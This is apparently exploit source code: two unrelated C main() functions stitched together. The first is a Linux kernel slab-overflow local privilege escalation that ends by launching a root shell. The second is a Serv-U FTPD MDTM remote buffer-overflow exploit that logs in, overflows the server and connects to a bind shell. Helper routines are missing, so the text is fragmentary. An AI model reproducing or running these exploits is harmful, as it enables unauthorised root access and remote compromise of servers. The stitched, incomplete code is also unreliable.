int main(int argc, char ** argv) {
int i, nbfiles;
int * files;
char tmpfile[100];
get_kernel_syms();
files = malloc(sizeof(int));
//check_slabs();
/* Spray slab with file structs */
for (i=0;;i++) {
sprintf(tmpfile, "/tmp/tmpfile%d", i);
files = realloc(files, (i+1)*sizeof(int));
if ((files[i] = open(tmpfile, O_RDWR|O_CREAT|O_SYNC)) < 0)
break;
}
//check_slabs();
printf("[+] Created %d files\n", nbfiles = i);
/* We cannot check slab info
* so may not be properly aligned
* (should work with argv[1] = 3)
*/
for (i=0;i< (argc > 1 ? atoi(argv[1]) : 1);i++) {
close(files[nbfiles-4-i]);
}
do_overflow();
for (i=0;i<nbfiles;i++)
write(files[i], "YOUPI", 5);
for (i=0;i<nbfiles;i++)
close(files[i]);
if (setresuid(0, 0, 0)) {
printf("[-] Exploit failed :(\n");
exit(1);
}
setresgid(0, 0, 0);
printf("[+] Launching root shell!\n");
execl("/bin/sh", "/bin/sh", NULL);
return 1;
}
int main (int c, char *v[])
{
int ch, fd, sd;
char *hostName = NULL, *userName = "******", *passWord = "******";
shellport = port;
fprintf (stderr, "Serv-U FTPD 3.x/4.x/5.x MDTM Command remote overflow exploit "VER"\n"
"bug find by bkbll ([email protected]) code by Sam ([email protected])\n\n");
if (c < 2) {
showHELP (v[0]);
exit (1);
}
while((ch = getopt(c, v, "h:t:u:p:P:c:d:")) != EOF) {
switch(ch) {
case 'h':
hostName = optarg;
break;
case 't':
x = atoi (optarg);
if (x > MAX_NUM) {
printf ("[-] wtf your input?\n");
exit (-1);
}
break;
case 'u':
userName = optarg;
break;
case 'p':
passWord = optarg;
break;
case 'P':
port = atoi (optarg);
break;
case 'd':
shellport = atoi (optarg);
break;
default:
showHELP (v[0]);
return 0;
}
}
fd = ftp_login (hostName, port, userName, passWord);
if (fd <= 0) {
printf ("[-] can't connnect\n");
exit (-1);
}
do_overflow (fd);
close (fd);
sleep (3);
sd = new_tcpConnect (hostName, shellport, 3000);
if (sd <= 0) {
printf ("[-] failed\n");
return -1;
}
fprintf (stderr, "[+] successed!!\n\n\n");
sh (0, 1, sd);
close (sd);
return 0;
}
